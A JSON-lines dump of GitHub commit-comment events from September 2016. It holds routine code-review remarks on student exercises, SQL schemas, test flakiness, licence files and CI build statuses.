{"id":"4619356264","type":"CommitCommentEvent","actor":{"login":"adamnovak"},"repo":{"name":"cmarkello/toil-scripts"},"payload":{"comment":{"id":19176536,"position":103,"line":103,"path":"src/toil_scripts/dockered_chunked_call.py","commit_id":"b2604b28f252a51d4576fb9c98fc4911ee21bfcd","created_at":"2016-09-26T17:49:50Z","updated_at":"2016-09-26T17:49:50Z","body":"What if someone uses the `-o10000` syntax? I think getopt in vg will accept it.\r\n\r\nSince these options need to be set to certain values for each run for this whole pipeline to work, what's the use case for the user overriding them?"}},"created_at":"2016-09-26T17:49:50Z"}
{"id":"4619358274","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"Chaparroa/hw_assignment_7"},"payload":{"comment":{"id":19176539,"position":316,"line":316,"path":"css/style.css","commit_id":"b8ae7160efa2baeb86bba9b1fae93731f205b84a","created_at":"2016-09-26T17:50:11Z","updated_at":"2016-09-26T17:50:11Z","body":"Your paragraph is responsive here, but you missed the ul within the benefits section. When you scale it down it flows off the page"}},"created_at":"2016-09-26T17:50:11Z"}
{"id":"4619361716","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"Chaparroa/hw_assignment_7"},"payload":{"comment":{"id":19176544,"position":5,"line":5,"path":"blog.html","commit_id":"b8ae7160efa2baeb86bba9b1fae93731f205b84a","created_at":"2016-09-26T17:50:46Z","updated_at":"2016-09-26T17:50:46Z","body":"Nice job using the viewport tag!"}},"created_at":"2016-09-26T17:50:46Z"}
{"id":"4619364147","type":"CommitCommentEvent","actor":{"login":"Sch3lp"},"repo":{"name":"pxlit-projects/classroom-exercise-1-bun00b"},"payload":{"comment":{"id":19176551,"position":null,"line":null,"path":null,"commit_id":"c914bb189c7888fbeaef226d087d9ca139debfdd","created_at":"2016-09-26T17:51:13Z","updated_at":"2016-09-26T17:51:13Z","body":"Hey, ferm dat ge behavior hebt uitgebreid van de Barista constructor, en voor wat veiligheid gezorgd hebt tegen pipo's die null `WorkEthic`s mee geven en al...\r\n\r\nMa waarom zou ge defaulten naar LazyWorkEthic? En niet gewoon een `IllegalArgument` throwen?"}},"created_at":"2016-09-26T17:51:13Z"}
{"id":"4619368624","type":"CommitCommentEvent","actor":{"login":"vtsukur"},"repo":{"name":"kallura/balance-calculation"},"payload":{"comment":{"id":19176556,"position":1,"line":1,"path":"db/src/main/resources/spring.datasource.properties","commit_id":"94a10024c6e1a1d3d3d4872d8b5274838ebe5378","created_at":"2016-09-26T17:52:00Z","updated_at":"2016-09-26T17:52:00Z","body":"`serverTimezone=UTC` sets a very specific time zone, which is not always desirable."}},"created_at":"2016-09-26T17:52:00Z"}
{"id":"4619370694","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"Chaparroa/hw_assignment_7"},"payload":{"comment":{"id":19176559,"position":323,"line":323,"path":"css/style.css","commit_id":"b8ae7160efa2baeb86bba9b1fae93731f205b84a","created_at":"2016-09-26T17:52:23Z","updated_at":"2016-09-26T17:52:23Z","body":"Nice job targeting the block quote; however, when you scale the page down it still flows off the page. Perhaps try setting the width with a responsive unit."}},"created_at":"2016-09-26T17:52:23Z"}
{"id":"4619371370","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19176560,"position":14,"line":1904,"path":"chat-plugins/info.js","commit_id":"fc3adb13aaf93dad06b9e9c5b8522ab5414da077","created_at":"2016-09-26T17:52:32Z","updated_at":"2016-09-26T17:52:32Z","body":"...because `!om g` is so much less spammy than `!formatshelp g`?"}},"created_at":"2016-09-26T17:52:32Z"}
{"id":"4619375205","type":"CommitCommentEvent","actor":{"login":"vtsukur"},"repo":{"name":"kallura/balance-calculation"},"payload":{"comment":{"id":19176570,"position":8,"line":8,"path":"db/src/main/resources/schema.sql","commit_id":"94a10024c6e1a1d3d3d4872d8b5274838ebe5378","created_at":"2016-09-26T17:53:16Z","updated_at":"2016-09-26T17:53:16Z","body":"No need to use `_table` suffix as it is clear that the database object we are managing here is a table."}},"created_at":"2016-09-26T17:53:16Z"}
{"id":"4619379415","type":"CommitCommentEvent","actor":{"login":"Sch3lp"},"repo":{"name":"pxlit-projects/classroom-exercise-1-Dragonites"},"payload":{"comment":{"id":19176585,"position":null,"line":null,"path":null,"commit_id":"ef1d0af6aaa176a448b342a653f0a514ed8896df","created_at":"2016-09-26T17:54:03Z","updated_at":"2016-09-26T17:54:03Z","body":"`creator` is eigenlijk `constructor` in java/Object Oriented _lingo_.\r\n\r\nHet gaat al de goei richting uit, maar wat als we nu een nieuwe `WorkEthic` implementatie zouden introduceren van een nieuwe Barista bvb?\r\n\r\nDan zitten we opnieuw met de gebakken peren denk ik, nie?\r\n\r\nDus tis nog nie helemaal goed opgelost."}},"created_at":"2016-09-26T17:54:03Z"}
{"id":"4619382015","type":"CommitCommentEvent","actor":{"login":"arnisjuraga"},"repo":{"name":"Copona/copona"},"payload":{"comment":{"id":19176589,"position":null,"line":null,"path":null,"commit_id":"55017a39404ad3b96aabf031c3f0913b986ddfcb","created_at":"2016-09-26T17:54:31Z","updated_at":"2016-09-26T17:54:31Z","body":"#1 first step"}},"created_at":"2016-09-26T17:54:31Z"}
{"id":"4619383482","type":"CommitCommentEvent","actor":{"login":"vtsukur"},"repo":{"name":"kallura/balance-calculation"},"payload":{"comment":{"id":19176594,"position":13,"line":13,"path":"db/src/main/resources/schema.sql","commit_id":"94a10024c6e1a1d3d3d4872d8b5274838ebe5378","created_at":"2016-09-26T17:54:46Z","updated_at":"2016-09-26T17:54:46Z","body":"Would it make sense to set foreign keys here linking to `customers` table in addition to a simple `NOT NULL` constraint?"}},"created_at":"2016-09-26T17:54:46Z"}
{"id":"4619384371","type":"CommitCommentEvent","actor":{"login":"seancpeters"},"repo":{"name":"dotnet/templating"},"payload":{"comment":{"id":19176596,"position":21,"line":34,"path":"src/Microsoft.TemplateEngine.Utils/Glob.cs","commit_id":"a3ac146a9a4682e4ff1255ac3d23f1e48f4d4f3e","created_at":"2016-09-26T17:54:55Z","updated_at":"2016-09-26T17:54:55Z","body":"Lead whitespace would cause this to not see the '!'"}},"created_at":"2016-09-26T17:54:55Z"}
{"id":"4619387350","type":"CommitCommentEvent","actor":{"login":"elboraki"},"repo":{"name":"hiseb90/test4operation-"},"payload":{"comment":{"id":19176599,"position":null,"line":null,"path":null,"commit_id":"61215b5ca4e1dd7b9aba6325a1e1e30315c38133","created_at":"2016-09-26T17:55:28Z","updated_at":"2016-09-26T17:55:28Z","body":"I 've created new function for subtracting two numbers"}},"created_at":"2016-09-26T17:55:28Z"}
{"id":"4619397798","type":"CommitCommentEvent","actor":{"login":"Sch3lp"},"repo":{"name":"pxlit-projects/classroom-exercise-1-arnoBruynseels"},"payload":{"comment":{"id":19176622,"position":null,"line":null,"path":null,"commit_id":"560f7e7f30d9947001e4238e7784ef975478a7fb","created_at":"2016-09-26T17:57:19Z","updated_at":"2016-09-26T17:57:19Z","body":"Goede oplossing.\r\n\r\nKheb wel efkes door de formatting moeten uit lezen.\r\n\r\nIs dat uw eigen voorkeur, of is dat gewoon een instelling van uwe IDE?\r\n\r\nIk heb het over de plaatsing van de curly braces.\r\n\r\n```\r\npublic void derp()\r\n{\r\n   ...\r\n}\r\n```\r\n\r\nipv\r\n\r\n```\r\npublic void derp() {\r\n   ...\r\n}\r\n```"}},"created_at":"2016-09-26T17:57:19Z"}
{"id":"4619398394","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"cai799174/OpenStudio"},"payload":{"comment":{"id":19176624,"position":null,"line":null,"path":null,"commit_id":"b29604235bbc78a243fbabcdf30d073a64bf1262","created_at":"2016-09-26T17:57:24Z","updated_at":"2016-09-26T17:57:24Z","body":"1973-AddDualDuctTerminals (cai799174) - i386-Windows-7-VisualStudio-12: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b29604235bbc78a243fbabcdf30d073a64bf1262-PR2358-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b29604235bbc78a243fbabcdf30d073a64bf1262-PR2358-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-20.15%25-red.svg)</a> \n"}},"created_at":"2016-09-26T17:57:24Z"}
{"id":"4619407303","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19176647,"position":null,"line":null,"path":null,"commit_id":"7c4e7cb6c1f4fe075d37b318bcf582d17811da84","created_at":"2016-09-26T17:58:59Z","updated_at":"2016-09-26T17:58:59Z","body":"temp (macumber) - x86_64-MacOS-10.10-clang: OK (2391 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7c4e7cb6c1f4fe075d37b318bcf582d17811da84-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7c4e7cb6c1f4fe075d37b318bcf582d17811da84-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-97.67%25-yellow.svg)</a> \n"}},"created_at":"2016-09-26T17:58:59Z"}
{"id":"4619409882","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19176653,"position":null,"line":null,"path":null,"commit_id":"42a9eda99c902bc18a852da9d7c210360068e07c","created_at":"2016-09-26T17:59:23Z","updated_at":"2016-09-26T17:59:23Z","body":"os_2_0_develop (kbenne) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-42a9eda99c902bc18a852da9d7c210360068e07c-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-42a9eda99c902bc18a852da9d7c210360068e07c-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-26T17:59:23Z"}
{"id":"4619411296","type":"CommitCommentEvent","actor":{"login":"Sch3lp"},"repo":{"name":"pxlit-projects/classroom-exercise-1-itsBrianP"},"payload":{"comment":{"id":19176655,"position":null,"line":null,"path":null,"commit_id":"dc9daa2375d95c932fde0b4c0ac5040e813545ab","created_at":"2016-09-26T17:59:37Z","updated_at":"2016-09-26T17:59:37Z","body":"Ineens ook de oplossing dat ik zocht. 😄 \r\n\r\n`.containsOnly` had ge mogen laten staan, want dat pakt ook ne varargs van `WorkEthic`s.\r\n\r\nVerschil is dat `.contains` **niet** zou falen wanneer er in die list ook een andere `WorkEthic` zou zitten, en `.containsOnly` zou wel falen.\r\n\r\nDat is vaak, en ook in dit geval, dus prefereerbaar. Vooral omwille van het feit dat ge daarmee explicieter kunt uitdrukken wat ge verwacht.\r\n\r\nGoed gedaan."}},"created_at":"2016-09-26T17:59:37Z"}
{"id":"4619413588","type":"CommitCommentEvent","actor":{"login":"tgjonestx"},"repo":{"name":"zenoss/zenoss-centos-base"},"payload":{"comment":{"id":19176661,"position":5,"line":9,"path":"makefile","commit_id":"4bca99b57efb07137f8ce5aa8dae7e319f5d4fa6","created_at":"2016-09-26T18:00:03Z","updated_at":"2016-09-26T18:00:03Z","body":"Is the `.` in `.devtools` causing a problem?  If not, please leave it as is. \r\n\r\n`zendev/devimg` built from this image, so if you change the extension, you'll break `zendev devimg`"}},"created_at":"2016-09-26T18:00:03Z"}
{"id":"4619414000","type":"CommitCommentEvent","actor":{"login":"Sch3lp"},"repo":{"name":"pxlit-projects/classroom-exercise-1-daanbergmans"},"payload":{"comment":{"id":19176663,"position":null,"line":null,"path":null,"commit_id":"5cf2ee8361d9f52042d1c7b072361bd4f2a31948","created_at":"2016-09-26T18:00:08Z","updated_at":"2016-09-26T18:00:08Z","body":"Bam. Goei oplossing."}},"created_at":"2016-09-26T18:00:08Z"}
{"id":"4619417977","type":"CommitCommentEvent","actor":{"login":"jcadduono"},"repo":{"name":"offensive-security/nethunter-app"},"payload":{"comment":{"id":19176682,"position":null,"line":null,"path":null,"commit_id":"5696afb39698a8c7f5996ae6c2a0d2c78697d707","created_at":"2016-09-26T18:00:46Z","updated_at":"2016-09-26T18:00:46Z","body":"2 issues here:\r\n\r\n1. Use nh.whichBusybox() (I think that's what it's called) for version check rather than busybox\r\n2. I'm not sure if it's possible but could you make the kernel version box auto expand height, or at least make it taller? It's kind of weird scrolling on 1 line"}},"created_at":"2016-09-26T18:00:46Z"}
{"id":"4619419455","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"juliendubrail/julien_spices"},"payload":{"comment":{"id":19176689,"position":23,"line":23,"path":"url_describe/index.js","commit_id":"7260e0b7f1c3ab674960aded12dcd3f132821f19","created_at":"2016-09-26T18:01:02Z","updated_at":"2016-09-26T18:01:02Z","body":"what if the query string doesn't have a and b parameters? what if it has c and d parameters, for example?"}},"created_at":"2016-09-26T18:01:02Z"}
{"id":"4619420207","type":"CommitCommentEvent","actor":{"login":"Sch3lp"},"repo":{"name":"pxlit-projects/classroom-exercise-1-SanderElsen"},"payload":{"comment":{"id":19176691,"position":null,"line":null,"path":null,"commit_id":"da5fd1bd41162a26354d34742a4ff9478c8758ad","created_at":"2016-09-26T18:01:10Z","updated_at":"2016-09-26T18:01:10Z","body":"Goed gedaan.\r\n\r\nOok duidelijke commit message. 👍 "}},"created_at":"2016-09-26T18:01:10Z"}
{"id":"4619420677","type":"CommitCommentEvent","actor":{"login":"alexandrudima"},"repo":{"name":"paulmillr/chokidar"},"payload":{"comment":{"id":19176697,"position":26,"line":268,"path":"README.md","commit_id":"f17186dff7b27c67b17a644c333cc239b42827ba","created_at":"2016-09-26T18:01:14Z","updated_at":"2016-09-26T18:01:14Z","body":"@paulmillr This change brings up a notch the level of difficulty to automate License text extraction. It was already difficult by the License text placement in the README.md, ... but now I give up :). \r\n\r\n--\r\n\r\nThe context:\r\n\r\nWith VSCode we try very hard to make sure we acknowledge and credit correctly all the OSS components we ship with, one requirement of crediting correctly is that the license text we include is self-contained and resolved.\r\n\r\n-- \r\n\r\nMy tool now generates \"[MIT](https://github.com/paulmillr/mit) (c) 2016 Paul Miller (http://paulmillr.com) & Elan Shanker\" which is not something the legal guys are happy with. i.e. https://github.com/paulmillr/mit can change\r\n\r\nPlease consider (if it's ok with you) bringing back the explicit license text or even putting it in a LICENSE file (pretty standard for other poor souls having to deal with license texts).\r\n\r\nMy License text extraction tool will quickly become a sad and manual process.\r\n\r\nSorry for the weird request, and thanks for your time :)"}},"created_at":"2016-09-26T18:01:14Z"}
{"id":"4619420686","type":"CommitCommentEvent","actor":{"login":"vtsukur"},"repo":{"name":"kallura/balance-calculation"},"payload":{"comment":{"id":19176698,"position":24,"line":24,"path":"db/src/main/java/org/task/repositories/initializers/DbInitializerImpl.java","commit_id":"94a10024c6e1a1d3d3d4872d8b5274838ebe5378","created_at":"2016-09-26T18:01:15Z","updated_at":"2016-09-26T18:01:15Z","body":"Since we are dealing with two records only, it would be easier just to use a simple `update` here, not a batch."}},"created_at":"2016-09-26T18:01:15Z"}
{"id":"4619427176","type":"CommitCommentEvent","actor":{"login":"FlatOutPS2"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19176715,"position":null,"line":null,"path":null,"commit_id":"04d82d81278c564080cc116655e7ad415f90f637","created_at":"2016-09-26T18:02:23Z","updated_at":"2016-09-26T18:02:23Z","body":"I notice a distinct lack of flickering textures in the R&C 1 demo."}},"created_at":"2016-09-26T18:02:23Z"}
{"id":"4619428483","type":"CommitCommentEvent","actor":{"login":"monsta"},"repo":{"name":"mate-desktop/mate-desktop.org"},"payload":{"comment":{"id":19176720,"position":null,"line":null,"path":null,"commit_id":"5d16e1180a1b4446f71866db9b12462bdb06c93e","created_at":"2016-09-26T18:02:37Z","updated_at":"2016-09-26T18:02:37Z","body":"It's called ```GTK+3``` after all... :smile:"}},"created_at":"2016-09-26T18:02:37Z"}
{"id":"4619428847","type":"CommitCommentEvent","actor":{"login":"tgjonestx"},"repo":{"name":"zenoss/build-tools"},"payload":{"comment":{"id":19176721,"position":null,"line":null,"path":null,"commit_id":"aac4552798f37a4cf3bb03ad7d190c87206f2b53","created_at":"2016-09-26T18:02:41Z","updated_at":"2016-09-26T18:02:41Z","body":"Please run an instance of `zenoss/zenoss-centos-base:1.2.7` and verify that these tools are really NOT in that image.  Even if they are not in the Dockerfile for zenoss-centos-base, they may be included in one of the images upstream of zenoss-centos-base\r\n```\r\n     sudo \\\r\n     make \\\r\n     which \\\r\n     unzip \\\r\n      patch \\\r\n     wget \\\r\n     net-snmp \\\r\n     net-snmp-utils \\\r\n     rsync \\\r\n     redis \\\r\n     openssl-devel \\\r\n     hiredis \\\r\n     tar \\\r\n```"}},"created_at":"2016-09-26T18:02:41Z"}
{"id":"4619429968","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":19176729,"position":null,"line":null,"path":null,"commit_id":"aef38aabe810bd796f52263e67396103c64283ba","created_at":"2016-09-26T18:02:52Z","updated_at":"2016-09-26T18:02:52Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#QPaXiATMRj2qfJpu_wD4fw"}},"created_at":"2016-09-26T18:02:52Z"}
{"id":"4619437452","type":"CommitCommentEvent","actor":{"login":"joakimk"},"repo":{"name":"jcelliott/toniq"},"payload":{"comment":{"id":19176746,"position":null,"line":null,"path":null,"commit_id":"b32df755896203d8ee6e930c17505e4e10950389","created_at":"2016-09-26T18:04:04Z","updated_at":"2016-09-26T18:04:04Z","body":"I've been playing around with not keeping all jobs in memory for https://github.com/joakimk/toniq/issues/17. No takeover changes yet."}},"created_at":"2016-09-26T18:04:04Z"}
{"id":"4619441784","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19176762,"position":null,"line":null,"path":null,"commit_id":"42a9eda99c902bc18a852da9d7c210360068e07c","created_at":"2016-09-26T18:04:49Z","updated_at":"2016-09-26T18:04:49Z","body":"os_2_0_develop (kbenne) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-42a9eda99c902bc18a852da9d7c210360068e07c-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-26T18:04:49Z"}
{"id":"4619443828","type":"CommitCommentEvent","actor":{"login":"carlosportella"},"repo":{"name":"carlosportella/millennium"},"payload":{"comment":{"id":19176768,"position":null,"line":null,"path":null,"commit_id":"dcf2a54299dbc18f1b2eaca18d9ddf6b141da848","created_at":"2016-09-26T18:05:10Z","updated_at":"2016-09-26T18:05:10Z","body":"tste"}},"created_at":"2016-09-26T18:05:10Z"}
{"id":"4619444066","type":"CommitCommentEvent","actor":{"login":"vtsukur"},"repo":{"name":"kallura/balance-calculation"},"payload":{"comment":{"id":19176769,"position":15,"line":15,"path":"db/src/main/java/org/task/repositories/initializers/DbInitializerImpl.java","commit_id":"94a10024c6e1a1d3d3d4872d8b5274838ebe5378","created_at":"2016-09-26T18:05:13Z","updated_at":"2016-09-26T18:05:13Z","body":"There is no real reason to break down `DbInitializer` into an interface and implementation since no application code initiates data insertion."}},"created_at":"2016-09-26T18:05:13Z"}
{"id":"4619448605","type":"CommitCommentEvent","actor":{"login":"chautruongthinh"},"repo":{"name":"chautruongthinh/android_packages_apps_CMUpdater"},"payload":{"comment":{"id":19176782,"position":6,"line":8,"path":"AndroidManifest.xml","commit_id":"88826e0bfe6d368c494d28417b9da84df8c0ce4a","created_at":"2016-09-26T18:06:03Z","updated_at":"2016-09-26T18:06:03Z","body":"You not need update to 24"}},"created_at":"2016-09-26T18:06:03Z"}
{"id":"4619451270","type":"CommitCommentEvent","actor":{"login":"danrl"},"repo":{"name":"CZ-NIC/turris-os"},"payload":{"comment":{"id":19176788,"position":null,"line":null,"path":null,"commit_id":"38a725907ea847fc03a12bd9df380bcd4bfb2553","created_at":"2016-09-26T18:06:32Z","updated_at":"2016-09-26T18:06:32Z","body":"Is there a timeframe for when kernel 4.1 makes it to Turris Omnia?"}},"created_at":"2016-09-26T18:06:32Z"}
{"id":"4619454527","type":"CommitCommentEvent","actor":{"login":"pveber"},"repo":{"name":"biocaml/biocaml"},"payload":{"comment":{"id":19176794,"position":null,"line":null,"path":null,"commit_id":"ca7cb5807527e80a59e689cd5d417023f19bd9c1","created_at":"2016-09-26T18:07:05Z","updated_at":"2016-09-26T18:07:05Z","body":"Ok got it, thanks!"}},"created_at":"2016-09-26T18:07:05Z"}
{"id":"4619458369","type":"CommitCommentEvent","actor":{"login":"willkuer"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19176806,"position":null,"line":null,"path":null,"commit_id":"04d82d81278c564080cc116655e7ad415f90f637","created_at":"2016-09-26T18:07:46Z","updated_at":"2016-09-26T18:07:46Z","body":"I guess you meant size doesn't matter... But really.. What is this 0.0625?"}},"created_at":"2016-09-26T18:07:46Z"}
{"id":"4619459373","type":"CommitCommentEvent","actor":{"login":"koeninger"},"repo":{"name":"apache/spark"},"payload":{"comment":{"id":19176808,"position":157,"line":261,"path":"external/kafka-0-10-sql/src/main/scala/org/apache/spark/sql/kafka010/KafkaSourceProvider.scala","commit_id":"e1671525d142b249749fcd58d5d3bc325fc46c71","created_at":"2016-09-26T18:07:57Z","updated_at":"2016-09-26T18:07:57Z","body":"I'm not clear on why you want to hide the fact that this is auto.offset.reset\r\n\r\nEven if you do want to hide it, this is a poor name for the configuration.  Its value is neither a Kafka offset nor an Sql offset."}},"created_at":"2016-09-26T18:07:57Z"}
{"id":"4619460334","type":"CommitCommentEvent","actor":{"login":"nathanielc"},"repo":{"name":"influxdata/kapacitor"},"payload":{"comment":{"id":19176812,"position":null,"line":null,"path":null,"commit_id":"2289c9dc4e2cba2af32200b84b5d47ab157ade8e","created_at":"2016-09-26T18:08:09Z","updated_at":"2016-09-26T18:08:09Z","body":"@geekard We hadn't thought of that but wouldn't be hard to add once the rest of the system is put in place. Thanks for the suggestion."}},"created_at":"2016-09-26T18:08:09Z"}
{"id":"4619462108","type":"CommitCommentEvent","actor":{"login":"arnisjuraga"},"repo":{"name":"Copona/copona"},"payload":{"comment":{"id":19176818,"position":null,"line":null,"path":null,"commit_id":"55017a39404ad3b96aabf031c3f0913b986ddfcb","created_at":"2016-09-26T18:08:26Z","updated_at":"2016-09-26T18:08:26Z","body":"#1 fixed admin settings"}},"created_at":"2016-09-26T18:08:26Z"}
{"id":"4619466864","type":"CommitCommentEvent","actor":{"login":"mavrothal"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19176833,"position":null,"line":null,"path":null,"commit_id":"81d8d031482691f7d0f62d56ef41a29dc85049bd","created_at":"2016-09-26T18:09:18Z","updated_at":"2016-09-26T18:09:18Z","body":"What about something like this\r\n```\r\npuppy_help() {\r\n /usr/lib/gtkdialog/box_splash -close never -text \"$(gettext 'Loading help viewer...')\" &\r\n XPID=$!\r\n defaultbrowser file:///usr/share/doc/index.html &\r\n while [ \"$(ps aux | grep index\\.html | grep -v grep)\" = \"\" ]\r\n do\r\n  sleep 0.5\r\n done \r\n kill -9 $XPID\r\n}\r\n```"}},"created_at":"2016-09-26T18:09:18Z"}
{"id":"4619469278","type":"CommitCommentEvent","actor":{"login":"radare"},"repo":{"name":"zonkzonk/radare2"},"payload":{"comment":{"id":19176844,"position":4,"line":1473,"path":"libr/debug/p/native/linux/linux_coredump.c","commit_id":"cbb87b810a5cf8d6178af56bd0825e42b0df228f","created_at":"2016-09-26T18:09:43Z","updated_at":"2016-09-26T18:09:43Z","body":"nope its already in master\n> On 21 Sep 2016, at 20:41, zonkzonk <notifications@github.com> wrote:\n> \n> yes. need new pr? :p\n> \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub <https://github.com/zonkzonk/radare2/commit/cbb87b810a5cf8d6178af56bd0825e42b0df228f#commitcomment-19118580>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AA3-lpcjw3NBrrSWA9IbH2ecHe1H7sUmks5qsXpxgaJpZM4KCdZG>.\n> \n\n"}},"created_at":"2016-09-26T18:09:43Z"}
{"id":"4619473286","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":19176870,"position":null,"line":null,"path":null,"commit_id":"255fce4b1759ba1abe984198190b61ec39c99534","created_at":"2016-09-26T18:10:23Z","updated_at":"2016-09-26T18:10:23Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#SGqQn1FrRGqjyQzyo1lgLA"}},"created_at":"2016-09-26T18:10:23Z"}
{"id":"4619475409","type":"CommitCommentEvent","actor":{"login":"arnisjuraga"},"repo":{"name":"Copona/copona"},"payload":{"comment":{"id":19176881,"position":null,"line":null,"path":null,"commit_id":"5b134aa81b60133eb39048fddfff656c2c43415e","created_at":"2016-09-26T18:10:46Z","updated_at":"2016-09-26T18:10:46Z","body":"#1 "}},"created_at":"2016-09-26T18:10:46Z"}
{"id":"4619475707","type":"CommitCommentEvent","actor":{"login":"vtsukur"},"repo":{"name":"kallura/balance-calculation"},"payload":{"comment":{"id":19176885,"position":4,"line":4,"path":"executors/src/main/java/org/test/exceptions/NotFoundTaskException.java","commit_id":"94a10024c6e1a1d3d3d4872d8b5274838ebe5378","created_at":"2016-09-26T18:10:50Z","updated_at":"2016-09-26T18:10:50Z","body":"This and other exception classes may just use parent constructor and getter to set and get the message, not need to override it here."}},"created_at":"2016-09-26T18:10:50Z"}
{"id":"4619478261","type":"CommitCommentEvent","actor":{"login":"guilhermejcgois"},"repo":{"name":"Richsan/Krakacomp"},"payload":{"comment":{"id":19176892,"position":null,"line":null,"path":null,"commit_id":"6cad509415748630959ae3dcc62886acec447998","created_at":"2016-09-26T18:11:15Z","updated_at":"2016-09-26T18:11:15Z","body":"Na mensagem do ER-LEX05, a mensagem esperada não tem '#', mas no analisador sintático tem mensagem que espera que seja exibido, agora não sei se tira ou não.\r\n\r\nNa mensagem do ER-LEX07, eu abri o arquivo e lá tem `int i0.0;`, e lá diz que o caracter ilegal é o `.`, só que e esse i perdido aí?"}},"created_at":"2016-09-26T18:11:15Z"}
{"id":"4619483917","type":"CommitCommentEvent","actor":{"login":"kirushik"},"repo":{"name":"yurizhuravel/yelp_clone"},"payload":{"comment":{"id":19176927,"position":147,"line":80,"path":"spec/features/restaurants_feature_spec.rb","commit_id":"a1898998f21111e10351f11b0fd9da5c0226e727","created_at":"2016-09-26T18:12:15Z","updated_at":"2016-09-26T18:12:15Z","body":"If you don't mind me interfering, this definitely should be `expect(page).to have_no_text 'KFC'`. Otherwise the test will be _flickering_, failing from time to time without any external reason.\r\n\r\nThe thing is, `expect` is a _waiting_ method, running the condition in a loop unless it's satisfied or timeout is reached. If your AJAX request is too slow, or you've just added a fancy CSS transition to your elements —\r\nwhen `expect` does its check first couple of times your page can still have a `KFC` visible. The `not_to have_text` version will fail in such a case, but `to have_no_text` will just loop over and wait while the content goes away.\r\n\r\nThis negation trick works with more or less all Capybara selectors — and you seem to have more than one place in your feature specs which can benefit from it.\r\n\r\nPS. I'm not sure if you decided to make Ruby and Rails you weapon of choice — but if you did please let me know, I'll give your code a little bit more thorough review."}},"created_at":"2016-09-26T18:12:15Z"}
{"id":"4619486061","type":"CommitCommentEvent","actor":{"login":"iceman1001"},"repo":{"name":"Proxmark/proxmark3"},"payload":{"comment":{"id":19176937,"position":null,"line":null,"path":null,"commit_id":"fd4f21b766a715303f0b1436c9970f5965e644dc","created_at":"2016-09-26T18:12:37Z","updated_at":"2016-09-26T18:12:37Z","body":"this one breaks on none-gcc6.1 compilers.."}},"created_at":"2016-09-26T18:12:37Z"}
{"id":"4619486211","type":"CommitCommentEvent","actor":{"login":"arturtsh"},"repo":{"name":"arturtsh/cs110_hw2"},"payload":{"comment":{"id":19176938,"position":null,"line":null,"path":null,"commit_id":"210635d711f710e75525ab53cdfcd22d6d2fefc6","created_at":"2016-09-26T18:12:39Z","updated_at":"2016-09-26T18:12:39Z","body":"youtube link to factorial.js https://www.youtube.com/watch?v=GvMk-F3FMqs&feature=youtu.be"}},"created_at":"2016-09-26T18:12:39Z"}
{"id":"4619486430","type":"CommitCommentEvent","actor":{"login":"vtsukur"},"repo":{"name":"kallura/balance-calculation"},"payload":{"comment":{"id":19176944,"position":31,"line":31,"path":"executors/src/main/java/org/test/TaskExecutorImpl.java","commit_id":"94a10024c6e1a1d3d3d4872d8b5274838ebe5378","created_at":"2016-09-26T18:12:41Z","updated_at":"2016-09-26T18:12:41Z","body":"This pool is created, but never shut down, leading to potential memory leaks on context recreation."}},"created_at":"2016-09-26T18:12:41Z"}
